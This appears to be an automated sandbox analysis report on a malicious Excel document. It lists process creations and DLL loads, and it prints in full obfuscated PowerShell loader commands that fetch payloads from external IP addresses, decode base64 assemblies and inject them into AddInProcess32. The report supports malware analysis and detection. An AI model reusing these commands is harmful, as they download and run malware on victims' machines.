                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: RunPE.pdb source: powershell.exe, 0000000C.00000002.503385693.00000000002F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.504336170.0000000002713000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.pdbhP source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.pdb source: powershell.exe, 00000007.00000002.485211497.0000000002A99000.00000004.00000800.00020000.00000000.sdmp
                    Source: 46930000.0.drInitial sample: OLE indicators vbamacros = False
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                    Source: 12.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
